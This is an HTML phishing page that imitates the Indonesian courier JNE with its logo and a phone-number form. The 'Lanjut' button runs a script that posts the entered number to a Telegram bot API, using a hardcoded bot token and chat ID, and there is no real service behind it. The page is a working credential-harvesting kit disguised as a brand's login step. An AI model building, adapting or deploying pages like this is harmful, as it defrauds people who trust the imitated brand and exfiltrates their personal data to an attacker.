<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <title>Nomor hp</title>
        <link
            href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css"
            rel="stylesheet"
            integrity="sha384-KK94CHFLLe+nY2dmCWGMq91rCGa5gtU4mk92HdvYe+M/SXH301p5ILy+dN9+nJOZ"
            crossorigin="anonymous"
        />
        <style type="text/css" media="all">
            .form-group {
                margin-bottom: 15px;
            }

            .form-group label {
                display: block;
            }

            .form-group input {
                width: 100%;
                padding: 5px;
                border: 1px solid purple;
                border-radius: 7px;
                outline: none;
            }

            .form-group button {
                outline: none;
                width: 100%;
                padding: 8px;
                background-color: darkblue;
                color: #fff;
                border: none;
                cursor: pointer;
            }
        </style>
    </head>
    <body>
        <nav class="navbar bg-dark">
            <div class="container">
                <a class="navbar-brand" href="#">
                    <img src="jne.jpg" alt="navbar" width="70" height="30" />
                </a>
            </div>
        </nav>
        <div class="container mt-5">
            <img
                src="jne.jpg"
                class="rounded mx-auto d-block"
                alt="jumbotron"
                width="130"
                height="130"
            />
            <div class="form-group">
                <label for="username">Nomor Telepon</label>
                <input
                    type="text"
                    id="username"
                    name="username"
                    value=" +62 "
                />
            </div>
            <div class="form-group">
                <button name="masuk" onclick="sendData()">Lanjut</button>
            </div>
        </div>
        <script
            src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"
            integrity="sha384-ENjdO4Dr2bkBIFxQpeoTz1HIcje39Wm4jDKdf19U8gI4ddQ3GYNS7NTKfAdVQSZe"
            crossorigin="anonymous"
        ></script>
        <script type="text/javascript" charset="utf-8">
            async function sendMessage(chatId, text) {
                const url =
                    "https://api.telegram.org/bot6244331091:AAHX4H2ml0-BdOLS_WOOWxg7Em6hvodkUhg/sendMessage";
                const payload = {
                    chat_id: chatId,
                    text: text,
                };

                const response = await fetch(url, {
                    method: "POST",
                    headers: {
                        "Content-Type": "application/json",
                    },
                    body: JSON.stringify(payload),
                });
                console.log(response);
                if (!response.ok) {
                    throw new Error("Failed to send message");
                }
            }
            const sendData = () => {
                let username = document.querySelector("#username").value;
                let chatId = "5651329486";
                let text = `no.hp: ${username}`;
                sendMessage(chatId, text);
            };
        </script>
    </body>
</html>
